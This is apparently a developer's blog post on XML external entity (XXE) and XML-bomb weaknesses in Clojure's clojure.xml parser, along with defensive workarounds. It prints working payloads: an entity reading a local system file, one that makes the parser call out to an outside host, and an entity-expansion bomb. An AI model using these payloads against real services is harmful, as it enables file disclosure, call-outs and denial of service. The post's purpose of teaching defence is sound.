clojure.xml and untrusted input

Clojure’s standard library includes the namespace clojure.xml, which implements a XML parser. It’s not used much – which is great, because it’s vulnerable to XML external entity (XXE) attacks. It’s something that you want to be aware of if you’re using clojure.xml to process untrusted input.

Update (2022-03-27): XXE processing has been disabled in Clojure 1.11.0.

Juha Jokimäki tweeted about this already back in 2014. However, I still see clojure.xml occassionally used, so I thought it’s a good idea to blog about it.

Note: clojure.xml is not to be confused with data.xml, which is a separate library. data.xml has disabled XXE by default.

XML external entity attacks

XML external entities allow you to refer to resources outside of the file that you’re processing. For example, you can include the content of an external file. Here’s an example from OWASP:

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///etc/hostname" >]>
<foo>&xxe;</foo>

Let’s try it out:

;; I saved the example above as "hostname.xml"
(require 'clojure.xml '[clojure.java.io :as io])
(with-open [input (io/input-stream "hostname.xml")]
  (clojure.xml/parse input))
;; => {:tag :foo, :attrs nil, :content ["nixos\n"]}

My laptop’s hostname is nixos, so that checks out!

If you point the file:/// reference to a directory instead of a file, you get a listing of the directory contents. In principle, you could use http:// URLs too, but that did not work on my machine.

If you use a domain name in the file:// URL, Java tries to connect to it over FTP.

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file://quanttype.net" >]>
<foo>&xxe;</foo>

You might able to exfiltrate data using this mechanism. At least it’s a way to call home and if your FTP server is suitably broken, the parser seems to get stuck forever.

XML bombs

Juha Jokimäki’s example code also demonstrates a small XML bomb. An XML bomb is a short XML file gets expanded to a extremely large one when processed.

Luckily JDK defines some limits on the entity expansion to hinder this attack. The Wikipedia article has an example with a billion-time expansion, but JDK limits the expansion factor to 64 000 by default.

Thus, the Wikipedia example does not work, but here’s a 1.4 KB file gets expanded to 47 megabytes:

<?xml version="1.0"?>
<!DOCTYPE lolz [
 <!ELEMENT lolz (#PCDATA)>
 <!ENTITY lol0 "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000">
 <!ENTITY lol1 "&lol0;&lol0;&lol0;&lol0;&lol0;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
 <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
 <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
]>
<lolz>&lol5;</lolz>

Let’s try it:

;; Save the example above as "lol.xml"
(with-open [input (io/input-stream "lol.xml")]
  (-> (clojure.xml/parse input) (:content) (first) (count)))
;; => 50000000

(/ 50000000 1024.0 1024.0)
;; => 47.6837158203125

It’s not catastrophic: a single XML document won’t crash your server. Still, you might want to think about it if you process XML files from untrusted sources.

Workaround

Juha Jokimäki shows how to create a parser that disallows the document type declarations (DTDs) required by the attacks above:

(defn startparse-sax-no-doctype [s ch]
  (..
    (doto (javax.xml.parsers.SAXParserFactory/newInstance)
      (.setFeature javax.xml.XMLConstants/FEATURE_SECURE_PROCESSING true)
      (.setFeature "http://apache.org/xml/features/disallow-doctype-decl" true))
    (newSAXParser)
    (parse s ch)))
    
(with-open [input (io/input-stream "hostname.xml")]
  (clojure.xml/parse input startparse-sax-no-doctype))
;; Execution error (SAXParseException) at com.sun.org.apache.xerces.internal.util.ErrorHandlerWrapper/createSAXParseException (ErrorHandlerWrapper.java:204).
;; DOCTYPE is disallowed when the feature "http://apache.org/xml/features/disallow-doctype-decl" set to true.

However, my recommendation is to replace clojure.xml with data.xml. It has a couple of benefits:

  • It has nice, full-feature interface.
  • The parse tree it produces is similar to the one produced by clojure.xml, so for many users it’s a drop-in replacement.
  • It’s part of the Clojure contrib library suite, so it’s widely used and maintained.

XXE processing is disabled by default:

;; clj -Sdeps '{:deps {org.clojure/data.xml {:mvn/version "0.2.0-alpha6"}}}'
(require 'clojure.data.xml)
(with-open [input (io/input-stream "hostname.xml")]
  (clojure.data.xml/parse input))
;; => #xml/element{:tag :foo}

XML bombs are subject to the same limits as clojure.xml, since both the libraries use JDK’s XML parsing facilities. If you want to prevent them altogether, you can disable DTDs by setting :support-dtd false:

(with-open [input (io/input-stream "lol.xml")]
  (clojure.data.xml/parse input :support-dtd false))
;; Error printing return value (XMLStreamException) at com.sun.org.apache.xerces.internal.impl.XMLStreamReaderImpl/next (XMLStreamReaderImpl.java:652).
;; ParseError at [row,col]:[11,13]
;; Message: The entity "lol5" was referenced, but not declared.

Update: As a follow-up, see CLJ-2611 which aims to disable XXE processing in clojure.xml.


Comments or questions? Send me an e-mail.